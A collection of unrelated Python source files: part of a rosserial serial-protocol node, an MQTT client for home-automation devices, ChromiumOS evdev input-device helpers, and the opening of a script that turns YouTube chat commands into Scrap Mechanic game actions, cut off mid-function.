if len(bytes_read) < length:
rospy.logwarn("Serial Port read returned short (expected %d bytes, received %d instead)."
% (length, len(bytes_read)))
raise IOError()
return bytes_read
except Exception as e:
rospy.logwarn("Serial Port read failure: %s", e)
raise IOError()
def run(self):
""" Forward recieved messages to appropriate publisher. """
data = ''
while not rospy.is_shutdown():
if (rospy.Time.now() - self.lastsync).to_sec() > (self.timeout * 3):
if (self.synced == True):
rospy.logerr("Lost sync with device, restarting...")
else:
rospy.logerr("Unable to sync with device; possible link problem or link software version mismatch such as hydro rosserial_python with groovy Arduino")
self.lastsync_lost = rospy.Time.now()
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "no sync with device")
self.requestTopics()
self.lastsync = rospy.Time.now()
# This try-block is here because we make multiple calls to read(). Any one of them can throw
# an IOError if there's a serial problem or timeout. In that scenario, a single handler at the
# bottom attempts to reconfigure the topics.
try:
if self.port.inWaiting() < 1:
time.sleep(0.001)
continue
flag = [0,0]
flag[0] = self.tryRead(1)
if (flag[0] != '\xff'):
continue
flag[1] = self.tryRead(1)
if ( flag[1] != self.protocol_ver):
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
rospy.logerr("Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
protocol_ver_msgs = {'\xff': 'Rev 0 (rosserial 0.4 and earlier)', '\xfe': 'Rev 1 (rosserial 0.5+)', '\xfd': 'Some future rosserial version'}
if (flag[1] in protocol_ver_msgs):
found_ver_msg = 'Protocol version of client is ' + protocol_ver_msgs[flag[1]]
else:
found_ver_msg = "Protocol version of client is unrecognized"
rospy.loginfo("%s, expected %s" % (found_ver_msg, protocol_ver_msgs[self.protocol_ver]))
continue
msg_len_bytes = self.tryRead(2)
msg_length, = struct.unpack("<h", msg_len_bytes)
msg_len_chk = self.tryRead(1)
msg_len_checksum = sum(map(ord, msg_len_bytes)) + ord(msg_len_chk)
if msg_len_checksum % 256 != 255:
rospy.loginfo("wrong checksum for msg length, length %d" %(msg_length))
rospy.loginfo("chk is %d" % ord(msg_len_chk))
continue
# topic id (2 bytes)
topic_id_header = self.tryRead(2)
topic_id, = struct.unpack("<h", topic_id_header)
try:
msg = self.tryRead(msg_length)
except IOError:
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Packet Failed : Failed to read msg data")
rospy.loginfo("Packet Failed : Failed to read msg data")
rospy.loginfo("msg len is %d",len(msg))
raise
# checksum for topic id and msg
chk = self.tryRead(1)
checksum = sum(map(ord, topic_id_header) ) + sum(map(ord, msg)) + ord(chk)
if checksum % 256 == 255:
self.synced = True
try:
self.callbacks[topic_id](msg)
except KeyError:
rospy.logerr("Tried to publish before configured, topic id %d" % topic_id)
rospy.sleep(0.001)
else:
rospy.loginfo("wrong checksum for topic id and msg")
except IOError:
# One of the read calls had an issue. Just to be safe, request that the client
# reinitialize their topics.
self.requestTopics()
def setPublishSize(self, bytes):
if self.buffer_out < 0:
self.buffer_out = bytes
rospy.loginfo("Note: publish buffer size is %d bytes" % self.buffer_out)
def setSubscribeSize(self, bytes):
if self.buffer_in < 0:
self.buffer_in = bytes
rospy.loginfo("Note: subscribe buffer size is %d bytes" % self.buffer_in)
def setupPublisher(self, data):
""" Register a new publisher. """
try:
msg = TopicInfo()
msg.deserialize(data)
pub = Publisher(msg)
self.publishers[msg.topic_id] = pub
self.callbacks[msg.topic_id] = pub.handlePacket
self.setPublishSize(msg.buffer_size)
rospy.loginfo("Setup publisher on %s [%s]" % (msg.topic_name, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of publisher failed: %s", e)
def setupSubscriber(self, data):
""" Register a new subscriber. """
try:
msg = TopicInfo()
msg.deserialize(data)
if not msg.topic_name in self.subscribers.keys():
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Setup subscriber on %s [%s]" % (msg.topic_name, msg.message_type) )
elif msg.message_type != self.subscribers[msg.topic_name].message._type:
old_message_type = self.subscribers[msg.topic_name].message._type
self.subscribers[msg.topic_name].unregister()
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Change the message type of subscriber on %s from [%s] to [%s]" % (msg.topic_name, old_message_type, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of subscriber failed: %s", e)
def setupServiceServerPublisher(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceServerSubscriber(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceClientPublisher(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def setupServiceClientSubscriber(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def handleTimeRequest(self, data):
""" Respond to device with system time. """
t = Time()
t.data = rospy.Time.now()
data_buffer = StringIO.StringIO()
t.serialize(data_buffer)
self.send( TopicInfo.ID_TIME, data_buffer.getvalue() )
self.lastsync = rospy.Time.now()
def handleParameterRequest(self, data):
""" Send parameters to device. Supports only simple datatypes and arrays of such. """
req = RequestParamRequest()
req.deserialize(data)
resp = RequestParamResponse()
try:
param = rospy.get_param(req.name)
except KeyError:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if param == None:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if (type(param) == dict):
rospy.logerr("Cannot send param %s because it is a dictionary"%req.name)
return
if (type(param) != list):
param = [param]
#check to make sure that all parameters in list are same type
t = type(param[0])
for p in param:
if t!= type(p):
rospy.logerr('All Paramers in the list %s must be of the same type'%req.name)
return
if (t == int):
resp.ints= param
if (t == float):
resp.floats=param
if (t == str):
resp.strings = param
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.send(TopicInfo.ID_PARAMETER_REQUEST, data_buffer.getvalue())
def handleLoggingRequest(self, data):
""" Forward logging information from serial device into ROS. """
msg = Log()
msg.deserialize(data)
if (msg.level == Log.ROSDEBUG):
rospy.logdebug(msg.msg)
elif(msg.level== Log.INFO):
rospy.loginfo(msg.msg)
elif(msg.level== Log.WARN):
rospy.logwarn(msg.msg)
elif(msg.level== Log.ERROR):
rospy.logerr(msg.msg)
elif(msg.level==Log.FATAL):
rospy.logfatal(msg.msg)
def send(self, topic, msg):
""" Send a message on a particular topic to the device. """
with self.mutex:
length = len(msg)
if self.buffer_in > 0 and length > self.buffer_in:
rospy.logerr("Message from ROS network dropped: message larger than buffer.")
print msg
return -1
else:
#modified frame : header(2 bytes) + msg_len(2 bytes) + msg_len_chk(1 byte) + topic_id(2 bytes) + msg(x bytes) + msg_topic_id_chk(1 byte)
# second byte of header is protocol version
msg_len_checksum = 255 - ( ((length&255) + (length>>8))%256 )
msg_checksum = 255 - ( ((topic&255) + (topic>>8) + sum([ord(x) for x in msg]))%256 )
data = "\xff" + self.protocol_ver + chr(length&255) + chr(length>>8) + chr(msg_len_checksum) + chr(topic&255) + chr(topic>>8)
data = data + msg + chr(msg_checksum)
self.port.write(data)
return length
def sendDiagnostics(self, level, msg_text):
msg = diagnostic_msgs.msg.DiagnosticArray()
status = diagnostic_msgs.msg.DiagnosticStatus()
status.name = "rosserial_python"
msg.header.stamp = rospy.Time.now()
msg.status.append(status)
status.message = msg_text
status.level = level
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[0].key="last sync"
if self.lastsync.to_sec()>0:
status.values[0].value=time.ctime(self.lastsync.to_sec())
else:
status.values[0].value="never"
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[1].key="last sync lost"
status.values[1].value=time.ctime(self.lastsync_lost.to_sec())
self.pub_diagnostics.publish(msg)
|
coco.py
|
import json
import logging
import os
import threading
from time import sleep
from typing import Callable
import paho.mqtt.client as mqtt
from .coco_device_class import CoCoDeviceClass
from .coco_fan import CoCoFan
from .coco_light import CoCoLight
from .coco_switch import CoCoSwitch
from .coco_switched_fan import CoCoSwitchedFan
from .coco_climate import CoCoThermostat
from .coco_energy import CoCoEnergyMeter
from .coco_cover import CoCoCover
from .coco_accesscontrol import CoCoAccessControl
from .coco_generic import CoCoGeneric
from .const import *
from .helpers import *
_LOGGER = logging.getLogger(__name__)
sem = threading.Semaphore()
DEVICE_SETS = {
CoCoDeviceClass.SWITCHED_FANS: {INTERNAL_KEY_CLASS: CoCoSwitchedFan, INTERNAL_KEY_MODELS: LIST_VALID_SWITCHED_FANS},
CoCoDeviceClass.FANS: {INTERNAL_KEY_CLASS: CoCoFan, INTERNAL_KEY_MODELS: LIST_VALID_FANS},
CoCoDeviceClass.COVERS: {INTERNAL_KEY_CLASS: CoCoCover, INTERNAL_KEY_MODELS: LIST_VALID_COVERS},
CoCoDeviceClass.SWITCHES: {INTERNAL_KEY_CLASS: CoCoSwitch, INTERNAL_KEY_MODELS: LIST_VALID_SWITCHES},
CoCoDeviceClass.LIGHTS: {INTERNAL_KEY_CLASS: CoCoLight, INTERNAL_KEY_MODELS: LIST_VALID_LIGHTS},
CoCoDeviceClass.THERMOSTATS: {INTERNAL_KEY_CLASS: CoCoThermostat, INTERNAL_KEY_MODELS: LIST_VALID_THERMOSTATS},
CoCoDeviceClass.ENERGYMETERS: {INTERNAL_KEY_CLASS: CoCoEnergyMeter, INTERNAL_KEY_MODELS: LIST_VALID_ENERGYMETERS},
CoCoDeviceClass.ACCESSCONTROL: {INTERNAL_KEY_CLASS: CoCoAccessControl, INTERNAL_KEY_MODELS: LIST_VALID_ACCESSCONTROL},
CoCoDeviceClass.GENERIC: {INTERNAL_KEY_CLASS: CoCoGeneric, INTERNAL_KEY_MODELS: LIST_VALID_GENERICS}
}
class CoCo:
def __init__(self, address, username, password, port=8884, ca_path=None, switches_as_lights=False):
if switches_as_lights:
DEVICE_SETS[CoCoDeviceClass.LIGHTS] = {INTERNAL_KEY_CLASS: CoCoLight,
INTERNAL_KEY_MODELS: LIST_VALID_LIGHTS + LIST_VALID_SWITCHES}
DEVICE_SETS[CoCoDeviceClass.SWITCHES] = {INTERNAL_KEY_CLASS: CoCoSwitch, INTERNAL_KEY_MODELS: []}
# The device control buffer fields
self._keep_thread_running = True
self._device_control_buffer = {}
self._device_control_buffer_size = DEVICE_CONTROL_BUFFER_SIZE
self._device_control_buffer_command_size = DEVICE_CONTROL_BUFFER_COMMAND_SIZE
self._device_control_buffer_command_count = 0
self._device_control_buffer_thread = threading.Thread(target=self._publish_device_control_commands)
self._device_control_buffer_thread.start()
if ca_path is None:
ca_path = os.path.dirname(os.path.realpath(__file__)) + MQTT_CERT_FILE
client = mqtt.Client(protocol=MQTT_PROTOCOL, transport=MQTT_TRANSPORT)
client.username_pw_set(username, password)
client.tls_set(ca_path)
client.tls_insecure_set(True)
self._client = client
self._address = address
self._port = port
self._profile_creation_id = username
self._all_devices = None
self._device_callbacks = {}
self._devices = {}
self._devices_callback = {}
self._system_info = None
self._system_info_callback = lambda x: None
def __del__(self):
self._keep_thread_running = False
self._client.disconnect()
def connect(self):
def _on_message(client, userdata, message):
topic = message.topic
response = json.loads(message.payload)
if topic == self._profile_creation_id + MQTT_TOPIC_PUBLIC_RSP and \
response[KEY_METHOD] == MQTT_METHOD_SYSINFO_PUBLISH:
self._system_info = response
self._system_info_callback(self._system_info)
elif topic == (self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP) and \
response[KEY_METHOD] == MQTT_METHOD_DEVICES_LIST:
self._client.unsubscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP)
self._process_devices_list(response)
elif topic == (self._profile_creation_id + MQTT_TOPIC_SUFFIX_SYS_EVT) and \
response[KEY_METHOD] == MQTT_METHOD_SYSINFO_PUBLISHED:
# If the connected controller publishes sysinfo... we expect something to have changed.
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP, qos=1)
client.publish(self._profile_creation_id + MQTT_TOPIC_SUFFIX_CMD,
json.dumps({KEY_METHOD: MQTT_METHOD_DEVICES_LIST}), 1)
elif topic == (self._profile_creation_id + MQTT_TOPIC_SUFFIX_EVT) and \
(response[KEY_METHOD] == MQTT_METHOD_DEVICES_STATUS or response[KEY_METHOD] == MQTT_METHOD_DEVICES_CHANGED):
devices = extract_devices(response)
for device in devices:
try:
if KEY_UUID in device:
self._device_callbacks[device[KEY_UUID]][INTERNAL_KEY_CALLBACK](device)
except:
pass
def _on_connect(client, userdata, flags, rc):
if rc == 0:
_LOGGER.info('Connected!')
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP, qos=1)
client.subscribe(self._profile_creation_id + MQTT_TOPIC_PUBLIC_RSP, qos=1)
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_EVT, qos=1)
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_SYS_EVT, qos=1)
client.publish(self._profile_creation_id + MQTT_TOPIC_PUBLIC_CMD,
json.dumps({KEY_METHOD: MQTT_METHOD_SYSINFO_PUBLISH}), 1)
client.publish(self._profile_creation_id + MQTT_TOPIC_SUFFIX_CMD,
json.dumps({KEY_METHOD: MQTT_METHOD_DEVICES_LIST}), 1)
elif MQTT_RC_CODES[rc]:
raise Exception(MQTT_RC_CODES[rc])
else:
raise Exception('Unknown error')
def _on_disconnect(client, userdata, rc):
_LOGGER.warning('Disconnected')
for uuid, device_callback in self._device_callbacks.items():
offline = {'Online': 'False', KEY_UUID: uuid}
device_callback[INTERNAL_KEY_CALLBACK](offline)
self._client.on_message = _on_message
self._client.on_connect = _on_connect
self._client.on_disconnect = _on_disconnect
self._client.connect_async(self._address, self._port)
self._client.loop_start()
def disconnect(self):
self._client.loop_stop()
self._client.disconnect()
def get_systeminfo(self, callback):
self._system_info_callback = callback
if self._system_info:
self._system_info_callback(self._system_info)
def get_devices(self, device_class: CoCoDeviceClass, callback: Callable):
self._devices_callback[device_class] = callback
if self._devices and device_class in self._devices:
self._devices_callback[device_class](self._devices[device_class])
def _publish_device_control_commands(self):
while self._keep_thread_running:
device_commands_to_process = None
sem.acquire()
if len(self._device_control_buffer.keys()) > 0:
device_commands_to_process = self._device_control_buffer
self._device_control_buffer = {}
self._device_control_buffer_command_count = 0
sem.release()
if device_commands_to_process is not None:
command = process_device_commands(device_commands_to_process)
#_LOGGER.debug(json.dumps(command))
self._client.publish(self._profile_creation_id + MQTT_TOPIC_SUFFIX_CMD, json.dumps(command), 1)
sleep(0.05)
def _add_device_control(self, uuid, property_key, property_value):
while len(self._device_control_buffer.keys()) >= self._device_control_buffer_size or \
self._device_control_buffer_command_count >= self._device_control_buffer_command_size:
pass
sem.acquire()
self._device_control_buffer_command_count += 1
if uuid not in self._device_control_buffer:
self._device_control_buffer[uuid] = {}
self._device_control_buffer[uuid][property_key] = property_value
sem.release()
# Processes response on devices.list
def _process_devices_list(self, response):
# Only add devices that are actionable
actionable_devices = list(
filter(lambda d: d[KEY_TYPE] == DEV_TYPE_ACTION, extract_devices(response)))
actionable_devices.extend(list(
filter(lambda d: d[KEY_TYPE] == "thermostat", extract_devices(response))))
actionable_devices.extend(list(
filter(lambda d: d[KEY_TYPE] == "centralmeter", extract_devices(response))))
# Only prepare for devices that don't already exist
# TODO - Can't we do this when we need it (in initialize_devices ?)
existing_uuids = list(self._device_callbacks.keys())
for actionable_device in actionable_devices:
if actionable_device[KEY_UUID] not in existing_uuids:
self._device_callbacks[actionable_device[KEY_UUID]] = \
{INTERNAL_KEY_CALLBACK: None, KEY_ENTITY: None}
# Initialize
self.initialize_devices(CoCoDeviceClass.SWITCHED_FANS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.FANS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.SWITCHES, actionable_devices)
self.initialize_devices(CoCoDeviceClass.LIGHTS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.COVERS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.THERMOSTATS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.ENERGYMETERS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.GENERIC, actionable_devices)
def initialize_devices(self, device_class, actionable_devices):
base_devices = [x for x in actionable_devices if x[KEY_MODEL]
in DEVICE_SETS[device_class][INTERNAL_KEY_MODELS]]
if device_class not in self._devices:
self._devices[device_class] = []
for base_device in base_devices:
if self._device_callbacks[base_device[KEY_UUID]] and self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY] and \
self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY].uuid:
self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY].update_dev(base_device)
else:
self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY] = \
DEVICE_SETS[device_class][INTERNAL_KEY_CLASS](base_device,
self._device_callbacks[base_device[KEY_UUID]],
self._client,
self._profile_creation_id,
self._add_device_control)
self._devices[device_class].append(self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY])
if device_class in self._devices_callback:
self._devices_callback[device_class](self._devices[device_class])
|
evdev_utils.py
|
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import asyncore
from cros.factory.utils import process_utils
from cros.factory.external import evdev
def GetDevices():
"""Gets all the input devices.
Returns:
A list of evdev.InputDevice() instances of the input devices.
"""
return [evdev.InputDevice(d) for d in evdev.list_devices()]
def FilterEvdevEcodes(dev, cnf):
"""Check if the capabilities of the device satisfy that of the CNF
Args:
dev: evdev.InputDevice
cnf: list of lists of evdev.ecodes
Returns:
True if dev satisfies cnf
"""
caps = set(dev.capabilities().get(evdev.ecodes.EV_KEY, []))
for clause in cnf:
if set(clause) & caps == set():
return False
return True
def IsLidEventDevice(dev):
"""Check if a device is with EV_SW and SW_LID capabilities.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a lid event device.
"""
return evdev.ecodes.SW_LID in dev.capabilities().get(evdev.ecodes.EV_SW, [])
def IsTabletEventDevice(dev):
"""Check if a device is with EV_SW and SW_TABLET_MODE capabilities.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a tablet event device.
"""
return evdev.ecodes.SW_TABLET_MODE in dev.capabilities().get(
evdev.ecodes.EV_SW, [])
def IsKeyboardDevice(dev):
"""Check if a device is with EV_KEY and KEY_ENTER capabilities.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a keyboard device.
"""
keys = {
evdev.ecodes.KEY_ENTER,
evdev.ecodes.KEY_LEFTCTRL,
evdev.ecodes.KEY_LEFTALT
}
caps = set(dev.capabilities().get(evdev.ecodes.EV_KEY, []))
return keys.issubset(caps)
def SendKeys(key_sequence):
"""Sends the given key sequence through uinput.
Args:
key_sequence: A list of keys to send. For the list of valid key events, see
evdev.ecodes module.
"""
uinput = evdev.UInput()
for k in key_sequence:
uinput.write(evdev.ecodes.EV_KEY, k, 1)
for k in key_sequence:
uinput.write(evdev.ecodes.EV_KEY, k, 0)
uinput.syn()
uinput.close()
def IsTouchDevice(dev):
"""Check if a device is a touch device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a touch device.
"""
keycaps = dev.capabilities().get(evdev.ecodes.EV_KEY, [])
return evdev.ecodes.BTN_TOUCH in keycaps
def IsStylusDevice(dev):
"""Check if a device is a stylus device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a stylus device.
"""
return FilterEvdevEcodes(dev, [[
evdev.ecodes.BTN_STYLUS,
evdev.ecodes.BTN_STYLUS2,
evdev.ecodes.BTN_TOOL_PEN]])
def IsTouchpadDevice(dev):
"""Check if a device is a touchpad device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a touchpad device.
"""
keycaps = dev.capabilities().get(evdev.ecodes.EV_KEY, [])
return (evdev.ecodes.BTN_TOUCH in keycaps and
evdev.ecodes.BTN_MOUSE in keycaps)
def IsTouchscreenDevice(dev):
"""Check if a device is a touchscreen device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a touchscreen device.
"""
return (not IsTouchpadDevice(dev) and
evdev.ecodes.ABS_MT_SLOT in dict(
dev.capabilities().get(evdev.ecodes.EV_ABS, [])))
def IsMouseDevice(dev):
"""Check if a device is a mouse device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a mouse device.
"""
keycaps = dev.capabilities().get(evdev.ecodes.EV_KEY, [])
return (evdev.ecodes.BTN_MOUSE in keycaps and
evdev.ecodes.BTN_RIGHT in keycaps and
evdev.ecodes.BTN_MIDDLE in keycaps)
class FindDeviceError(RuntimeError):
"""An exception from FindDevice."""
def __init__(self, candidates, filtered_candidates) -> None:
super().__init__()
self.candidates = candidates
self.filtered_candidates = filtered_candidates
@staticmethod
def FormatDevice(dev):
return f'(path={dev.fn}, name={dev.name!r})'
@staticmethod
def FormatDevices(devices):
return str(sorted(map(FindDeviceError.FormatDevice, devices)))
def FormatFilteredCandidates(self):
return str({
key: self.FormatDevices(devices)
for key, devices in self.filtered_candidates
if devices
})
def __repr__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.__str__())
class DeviceNotFoundError(FindDeviceError):
"""An exception which indicates there is no such device."""
_message_template = "Can't find device. Filtered candidates: {}."
def __str__(self) -> str:
return self._message_template.format(self.FormatFilteredCandidates())
class MultipleDevicesFoundError(FindDeviceError):
"""An exception which indicates there are multiple such devices."""
_message_template = ('Not having exactly one candidate! Left candidates: {}. '
'Filtered candidates: {}.')
def __str__(self) -> str:
return self._message_template.format(
self.FormatDevices(self.candidates), self.FormatFilteredCandidates())
def FindDevice(*args):
"""Find a device that match all arguments.
Args:
Each argument should be None (skipped), int (event id), str (pattern to
search in evdev name), or a filter function with domain evdev.InputDevice.
Returns:
An evdev.InputDevice
"""
candidates = GetDevices()
filtered_candidates = []
for item in args:
# pylint: disable=cell-var-from-loop
if item is None:
continue
if isinstance(item, int):
dev_filter = lambda dev: dev.fn == '/dev/input/event%d' % item
elif isinstance(item, str):
if item in evdev.ecodes.__dict__:
dev_filter = lambda dev: FilterEvdevEcodes(
dev, [[evdev.ecodes.__dict__[item]]])
else:
dev_filter = lambda dev: item in dev.name
elif callable(item):
dev_filter = item
else:
raise ValueError('Invalid argument %r' % item)
filtered_candidates.append(
(item,
[candidate for candidate in candidates if not dev_filter(candidate)]))
candidates = list(filter(dev_filter, candidates))
if len(candidates) == 1:
return candidates[0]
if not candidates:
raise DeviceNotFoundError(candidates, filtered_candidates)
raise MultipleDevicesFoundError(candidates, filtered_candidates)
def DeviceReopen(dev):
"""Reopen a device so that the event buffer is cleared.
Args:
dev: evdev.InputDevice
Returns:
A different evdev.InputDevice of the same device but with empty event
buffer.
"""
return evdev.InputDevice(dev.fn)
class InputDeviceDispatcher(asyncore.file_dispatcher):
"""Extends asyncore.file_dispatcher to read input device."""
def __init__(self, device, event_handler):
self.device = device
self.event_handler = event_handler
asyncore.file_dispatcher.__init__(self, device)
def handle_read(self):
# Spec - https://docs.python.org/2/library/asyncore.html mentions about
# that recv() may raise socket.error with EAGAIN or EWOULDBLOCK, even
# though select.select() or select.poll() has reported the socket ready
# for reading.
#
# We have the similar issue here; the buffer might be still empty when
# reading from an input device even though asyncore calls handle_read().
# As a result, we call read_one() here because it will return None when
# buffer is empty. On the other hand, if we call read() and iterate the
# returned generator object then an IOError - EAGAIN might be thrown but
# this behavior is not documented so can't leverage on it.
while True:
event = self.device.read_one()
if event is None:
break
self.event_handler(event)
def writable(self):
return False
def StartDaemon(self):
"""Start a daemon thread forwarding events to event_handler."""
process_utils.StartDaemonThread(target=asyncore.loop)
|
readStream.py
|
import pytchat # most recent thing in the core is the updated stuff
import time
import json
import os
import sys
import copy
import requests
import threading
from winreg import *
import vdf
import json
from shutil import copyfile
import shutil
# import smObjects
## This automatically finds the scrap mechanic installation
## and sets SM_Location appropriately
aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
aKey = OpenKey(aReg, r"SOFTWARE\WOW6432Node\Valve\Steam")
steamPathKey=str(QueryValueEx(aKey, "InstallPath"))
def formatRegKey(key):
return key.split(',')[0].replace('\'', '').replace('\\\\', '\\').replace('(C:', 'C:')
steamPath = formatRegKey(steamPathKey)
vdfFile = os.path.join(steamPath, "steamapps", "libraryfolders.vdf")
vdfFileContent = str(vdf.load(open(vdfFile))).replace('\'', '\"')
alternateSteamLibraries = json.loads(vdfFileContent)["LibraryFolders"]
SM_Location = os.path.join(steamPath, "steamapps", "common", "Scrap Mechanic")
i = 1
while(str(i) in alternateSteamLibraries):
path = os.path.join(alternateSteamLibraries[str(i)], "common", "Scrap Mechanic")
if os.path.isdir(path):
SM_Location = path
break
i = i + 1
###########################################################
# dir_path is the current directory
dir_path = os.path.dirname(os.path.realpath(__file__))
# commonly use sm folder locations
base = os.path.join(dir_path, "Scripts")
smBase = os.path.join(SM_Location, "Survival", "Scripts", "game")
dataBase = os.path.join(smBase, "StreamReaderData")
blueprintBase = os.path.join(dataBase, "blueprints")
# commly used file locations
statOutput = os.path.join(dir_path, "DeathCounter.txt")
gameStats = os.path.join(dataBase, "gameStats.json")
# Import settings? for now have global settings
# TODO: Money pool to allow viewers to donate to a common goal
SETTINGS = {
'allFree': False, # make everything freee
'sponsorFree': True, # channel sponsors get free commands
'TheGuyMode': True, # Special mode for TheGuy920
'fixedCost': 0, # if >0 and allFree == false, all commands will cost this price
'interval': 1, # rate in which to check for new commands, BROKEN until fixed...
'prefix': ['!','/','$','%'],
'filename': os.path.join(dataBase, 'streamchat.json'),
'videoID': "wLiGcFnUuD0",
'commands': { # list of commands and parameters, their prices are the values
'spawn': {
'totebot': 0,
'woc': 0,
'worm': 0,
'haybot': 0,
'tapebot': 0,
'redtapebot': 0,
'farmbot': 0,
},
'give':{ # give items to player (automatically gives stack if possible?)
'components': 0, # gives 10
'glowsticks': 0,
'ammo': 0
},
'kit': { # gives player specified kit
'seed': 0,
'food': 0,
'starter': 0,
'pipe': 0,
'meme': 0,
'bonk': 0
},
'aggro': 0, # aggro all nearby units to player
'kill': 2, # kill player instantly
'trip': 0, # Make player trip
'slap': 0,
'shield':0, # shield player for bried ammount of time
'rain': 0, # spawn a bunch of explosives in the air, could be random objects?
'raid': 0, # random raid at levels
'blast':0,
'heal': 0,
'fast':0,
'slow':0
},
'internalCommands':
{
'import':0
},
'single': ['raid', 'fast', 'slow','heal','shield','blast','trip','slap','aggro','rain'] # uneccesary but list of all commands
}
def outputCommandQueue(commandQue):
# print("OUT=>", commandQue)
with open(SETTINGS['filename'], 'w') as outfile:
jsonMessage = json.dumps(commandQue)
# log("Writing commands",jsonMessage)
outfile.write(jsonMessage)
def addToQue(commands, handleCommand):
# adds to the already existing command que
# log(commands)
# Check if exists first
# log("addQWue",commands)
if not os.path.exists(SETTINGS['filename']):
f = open(SETTINGS['filename'], "a")
# make blank
f.write('[]')
f.close()
with open(SETTINGS['filename'], 'r') as inFile:
currentQue = json.load(inFile)
# log("Got Que",currentQue,"adding",commands)
# if empty? or check len too
if currentQue == None:
# Create empty list
currentQue = []
currentQue.extend(commands)
else:
currentQue.extend(commands)
# determines if the command should be handled or not
# unless this is being run from/after an internal command
# has executed, leave as default (True)
if handleCommand == True:
# TODO: get callback on success?
commandHandler(currentQue)
elif handleCommand == False:
# print("Sending Queue=>", currentQue)
outputCommandQueue(currentQue)
def commandHandler(commandQue):
# command handler will take 2 copies of the queue
commandList = copy.copy(commandQue)
# if the command type exsists in internalCommands, it will be removed from the final execution
# and will be executed internally instead
for command in copy.copy(commandQue):
if command['type'] in SETTINGS['internalCommands']:
commandList.remove(command)
handleInternalCommand(command)
# if the command queue is not empty, update it
# after command has been handled, add it to the
# queue again, but do not handle it
if(len(commandList) > 0):
addToQue(commandList, False)
def handleInternalCommand(command):
# internal command handler
# yea, only got import as of now...
if command['type'] == "import":
try:
# init fileId
fileId = command['params']
# if the command parameters are a list (ie. not a string)
if not isinstance(command['params'], str):
fileId = command['params'][0]
